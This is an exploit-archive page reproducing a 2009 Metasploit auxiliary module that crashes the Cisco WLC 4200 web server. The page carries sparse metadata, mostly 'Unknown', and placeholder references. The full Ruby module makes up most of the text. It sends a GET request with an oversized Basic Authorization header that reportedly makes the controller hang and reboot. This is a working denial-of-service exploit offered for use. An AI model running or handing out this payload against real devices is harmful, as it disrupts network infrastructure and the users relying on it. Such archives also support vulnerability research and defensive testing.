header-logo
Suggest Exploit
vendor:
WLC 4200
by:
Christoph Bott
N/A
CVSS
N/A
Denial of Service
Unknown
CWE
Product Name: WLC 4200
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Cisco WLC 4200 Basic Auth Denial of Service

This module triggers a Denial of Service condition in the Cisco WLC 4200 HTTP server. By sending a GET request with long authentication data, the device becomes unresponsive and reboots. Firmware is reportedly vulnerable.

Mitigation:

Unknown
Source

Exploit-DB raw data:

require 'msf/core'


class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::Tcp
        include Msf::Auxiliary::Dos

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Cisco WLC 4200 Basic Auth Denial of Service',
                        'Description'    => %q{

                                This module triggers a Denial of Service condition in the Cisco WLC 4200
                                HTTP server. By sending a GET request with long authentication data, the
                                device becomes unresponsive and reboots.  Firmware is reportedly vulnerable.
                        },
                        'Author'                => [ 'Christoph Bott <msf[at]bott.syss.de>' ],
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision: 5949 $',
                        'References'     =>
                                [
                                        [ 'BID', '???'],
                                        [ 'CVE', '???'],
                                        [ 'URL', 'http://www.cisco.com/?????'],
                                ],
                        'DisclosureDate' => 'January 26 2009'))

                register_options(
                        [
                                Opt::RPORT(80),
                        ], self.class)

        end

        def run
                connect

                print_status("Sending HTTP DoS packet")

                sploit =
                        "GET /screens/frameset.html HTTP/1.0\r\n" +
                        "Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"

                sock.put(sploit + "\r\n")

                disconnect
        end

end

# milw0rm.com [2009-07-27]

Navigation

Suggest Exploit

Services By CQR